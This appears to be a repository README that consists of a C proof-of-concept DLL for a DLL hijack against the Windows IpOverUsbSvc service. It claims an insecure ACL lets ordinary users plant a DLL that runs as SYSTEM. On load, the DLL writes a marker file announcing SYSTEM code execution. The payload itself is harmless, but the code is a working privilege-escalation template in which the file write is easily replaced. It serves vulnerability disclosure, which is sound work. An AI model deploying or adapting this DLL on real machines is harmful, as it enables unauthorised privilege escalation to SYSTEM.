README.md
Rendering markdown...
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hDLL, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
HANDLE hFile = CreateFileA(
"C:\\Windows\\Temp\\PWNED_SYSTEM.txt",
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile != INVALID_HANDLE_VALUE) {
char msg[] = "[+] IpOverUsbSvc DLL Hijack PoC\r\n"
"[+] Code execution as SYSTEM achieved!\r\n"
"[+] Vuln: Insecure ACL on C:\\Microsoft Shared\\\r\n"
"[+] BUILTIN\\Users have Full Control (F)\r\n";
DWORD written;
WriteFile(hFile, msg, sizeof(msg) - 1, &written, NULL);
CloseHandle(hFile);
}
}
return TRUE;
}